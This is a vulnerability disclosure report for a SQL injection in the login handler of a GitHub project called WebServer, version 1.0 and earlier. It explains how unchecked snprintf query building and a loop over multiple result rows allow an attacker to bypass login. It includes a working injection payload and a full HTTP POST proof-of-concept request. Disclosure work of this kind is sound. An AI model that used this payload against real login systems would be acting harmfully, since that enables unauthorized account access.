BUG_Author: s0l42
Affected Version: WebServer≤ 1.0
Vendor: WebServer GitHub Repository
Software: WebServer
Vulnerability Files:
code/http/httprequest.cpp:192-195Tips: To proof the vulnerability, we use a situation about user login, in fact, the risk of SQLi is more than we show.
A sql injection found in code/http/httprequest.cpp:192-195 of WebServer≤ 1.0, it use snprintf to format the user inputs username and password with sql statement select without any check.
Further more, here is another unsafe design making this vulnerability more dangerous. From line 203 to 219, there is a while loop to fetch all the data select statement queried, if we use comment like # or — ,the sql statement will get more than 1 row, thus, no matter whose password is hit, its account will login successfully.
To proof the vulnerability, we create 3 user, the first is test1/111, the second is test2/222 and the third is test3/333 . We use payload as follows, nomatter the user test exists or not, if password 333 hit, the server responses “欢迎您!”,which means “welcome” and we login successfully. (“错误!” means “error” and shows we login unsuccessfully)
username=test'/**/or/**/'1'/**/like/**/'1'#--&password=333
The PoC is as follows:
POST /login HTTP/1.1
Host: xxxx
Content-Length: 58
Cache-Control: max-age=0
Origin: xxxx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
username=test'/**/or/**/'1'/**/like/**/'1'#--&password=333